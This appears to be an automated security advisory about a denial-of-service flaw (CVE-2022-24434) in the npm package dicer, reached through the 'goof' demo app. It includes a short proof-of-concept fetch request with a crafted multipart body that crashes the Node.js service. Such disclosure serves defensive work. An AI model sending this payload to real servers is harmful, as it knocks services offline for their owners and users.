High severity - Denial of Service (DoS) vulnerability in dicer (package.json)

[github-actions]

• Package Manager: npm
• Vulnerable module: dicer
• Introduced through: goof@1.0.1, express-fileupload@0.0.5 and others

Detailed paths

• Introduced through: goof@1.0.1 › express-fileupload@0.0.5 › connect-busboy@0.0.2 › busboy@0.3.1 › dicer@0.3.0

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes.

PoC:

    fetch('form-image', {
      method: 'POST',
      headers: {
        ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro',
        ['content-length']: '145',
        host: '127.0.0.1:8000',
        connection: 'keep-alive',
      },
      body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--'
    });

Remediation

There is no fixed version for dicer.

References

• GitHub Commit
• GitHub Issue
• GitHub PR
  
  SNYK-JS-DICER-2311764
  (CVE-2022-24434) dicer@0.3.0